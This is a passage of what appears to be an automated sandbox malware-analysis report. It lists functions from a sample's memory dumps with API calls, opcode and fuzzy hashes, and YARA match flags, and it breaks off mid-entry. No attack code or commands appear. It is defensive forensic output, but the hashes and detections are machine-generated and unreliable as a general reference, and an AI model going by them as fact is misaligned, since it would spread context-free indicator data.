Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759

Function 0066FC6F Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0066FD9E

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction ID: d7044d7b0eb26247d6b6b419c0713cfc3ab9e4222843f07f059f237f1ec7f99a
Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction Fuzzy Hash: 52413D31A001106BDF686FB8AC46AEF3BA7EF46770F24063DF828D6391DA35594187A5

Function 0043FA08 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043FB37

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D

Function 00666B04 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0066047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 00666B51
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00666BDA
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00666BEC
__freea.LIBCMT ref: 00666BF5

Part of subcall function 0066390E: RtlAllocateHeap.NTDLL(00000000,0063DAD7,00000000), ref: 00663940

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
Instruction ID: f005fc1f3ca79830f20d88bc8518281533d77fdaec78e22df5bcf89addf5b2b1
Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
Instruction Fuzzy Hash: EA31BE72A0021AEBDF258F64DC81DEE7BA6EB40714F144268FC15DB290EB36DD61CB94

Function 0063D652 Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0063D6AA
__Xtime_diff_to_millis2.LIBCPMT ref: 0063D6C4
_xtime_get.LIBCPMT ref: 0063D6E7
__Xtime_diff_to_millis2.LIBCPMT ref: 0063D6F3

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
Instruction ID: 5c556c2bc8775647ba380f363243e4cadac3d49c8da87df197f44023c8d82865
Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
Instruction Fuzzy Hash: 91215E75E00219AFDF00EFA4DD829BEB7BAEF09714F100069F501A7291D771AE018BE4

Function 0040D3EB Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0040D443
__Xtime_diff_to_millis2.LIBCPMT ref: 0040D45D
_xtime_get.LIBCPMT ref: 0040D480
__Xtime_diff_to_millis2.LIBCPMT ref: 0040D48C

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
Instruction ID: bdb17b43c911747218acdb07252438506425be6b3c89ff1608d2b8794f0e438d
Opcode Fuzzy Hash: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
Instruction Fuzzy Hash: 0D213B75E002099FDF00EFE5DC829AEB7B8EF49714F10406AF901B7291DB78AD058BA5

Function 004236EF Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000), ref: 00423739
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721

Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D

__CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
String ID:
API String ID: 2630251706-0
Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98

Function 00401F9A Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000005), ref: 00401FAF
UpdateWindow.USER32 ref: 00401FB7
ShowWindow.USER32(00000000), ref: 00401FCB
MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Window$Show$MoveUpdate
String ID:
API String ID: 1339878773-0
Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C

Function 00659330 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0065934A

Part of subcall function 00659297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 006592C6
Part of subcall function 00659297: ___AdjustPointer.LIBCMT ref: 006592E1

_UnwindNestedFrames.LIBCMT ref: 0065935F
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00659370
CallCatchBlock.LIBVCRUNTIME ref: 00659398

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 39ee79a17d1a227970921601d11e43aa8c24f661de11b92009a98eb4262c4a21
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 81011332100148FBDF126F95CC42EEB3F6AEF88755F044018FE08A6121D332E865EBA5

Function 004290C9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 004290E3

Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A

_UnwindNestedFrames.LIBCMT ref: 004290F8
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
CallCatchBlock.LIBVCRUNTIME ref: 00429131

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8

Function 00665196 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0066513D,00000000,00000000,00000000,00000000,?,006653F5,00000006,0044A378), ref: 006651C8
GetLastError.KERNEL32(?,0066513D,00000000,00000000,00000000,00000000,?,006653F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,00662213), ref: 006651D4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0066513D,00000000,00000000,00000000,00000000,?,006653F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 006651E2

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 7b3c59d7e49f6bf6ad7f6ecce2371576f0aa211b523289e05c40074513c0531a
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 0801FC366026226BC7214F699C45E96BB9DAF47F61F200630F907D7240C720DA01C6E4

Function 00434F2F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC

Function 00656395 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 006563AF
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 006563C3
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 006563DB
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 006563F3

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: a91a8988de5c41928dc16d387494b305e7893e202071567a39725b6d14dd087f
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 28014932600211BBCF52EE58C881AEF77AB9F50351F400059FC01AB382CEB0ED19C2A0

Function 00652B82 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 00652BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 00652BCF

Part of subcall function 00648687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 006486A8
Part of subcall function 00648687: Hash.LIBCMT ref: 006486E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 00652BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 00652BF8

Part of subcall function 0064F6DF: Hash.LIBCMT ref: 0064F6F1

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction ID: 291e43909884d382d07ea966dd31d6cd098cf611b6ad0461592e7b341d96f515
Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction Fuzzy Hash: BF118E76800204AFC755DF64C8829CAF7F9AF19320F05861EE95687552EB70E904CBA4

Function 0042612E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8

Function 00652B91 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 00652BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 00652BCF

Part of subcall function 00648687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 006486A8
Part of subcall function 00648687: Hash.LIBCMT ref: 006486E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 00652BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 00652BF8

Part of subcall function 0064F6DF: Hash.LIBCMT ref: 0064F6F1

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction ID: 7156fd9e152c5de03e2d02f62618fc4d778c20998d5cfcb7fff5ad13c87d3c98
Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction Fuzzy Hash: 94016976400604ABC754DFA5C882EDAF7E9EF49320F008A2EE95A87241DB70F904CBA4

Function 006350CA Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 006350D1

Part of subcall function 0063BDAE: __EH_prolog3_GS.LIBCMT ref: 0063BDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 0063511C
__Getcoll.LIBCPMT ref: 0063512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0063513B

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction ID: e3f79303976c3024bf5753a4ec18da9db3df08ae677deeb395e977a8112c4484
Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction Fuzzy Hash: 8D014C71D10609AFEB40EFA4C445BDDB7B2BF54325F10802DE0556B282DBB49944CBD9

Function 00635B86 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00635B8D

Part of subcall function 0063BDAE: __EH_prolog3_GS.LIBCMT ref: 0063BDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 00635BD8
__Getcoll.LIBCPMT ref: 00635BE7
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00635BF7

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction ID: 6eab6d0d756d3386c5841204add488a7b5b8e8039875921773217f13d3cb094c
Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction Fuzzy Hash: 62014C719107089FEB40EFA4C485BDDB7B1BF14325F10802DE0566B282DBB49944CB99

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00405926

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
__Getcoll.LIBCPMT ref: 00405980
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98

Function 0064C13E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0064C170
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0064C180
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0064C190
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0064C1A4

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: e0c5a21a3872634d3ed457c2f43822011a2ad6b3eba714a892a1ada371bd3966
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 3801E43A006109ABDF929FD4DD128ED3BA7AB45360F148415F91886222D332CAB1AA81

Function 0041BED7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D

Function 0063D486 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00641342

Part of subcall function 00640BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00640BD6
Part of subcall function 00640BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00640BF7

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00641355
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00641361
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0064136A

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction ID: 1577da3a34f80d52a6aa4955ff061b1b12ea8a8af18476cb5e09d82a97a88e47
Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction Fuzzy Hash: A8F02430600318A7AB957FB408125BD35A76F42314F08007DBA119F381CE719D41929C

Function 00643773 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0064378C

Part of subcall function 00642B16: ___crtGetTimeFormatEx.LIBCMT ref: 00642B2C
Part of subcall function 00642B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00642B4B

GetLastError.KERNEL32 ref: 006437A8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006437BE
__CxxThrowException@8.LIBVCRUNTIME ref: 006437CC

Part of subcall function 006428EC: SetThreadPriority.KERNEL32(?,?), ref: 006428F8

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: 3a65d9e76dd4e8c2e63e21ee58fb05c75b5747434530350354788081eba7e52c
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: E4F0A7B2A002263ED760B7755C07FBB369DDF01751FA0082AB945E7282ED99D80482BC

Function 0040D21F Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB

Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
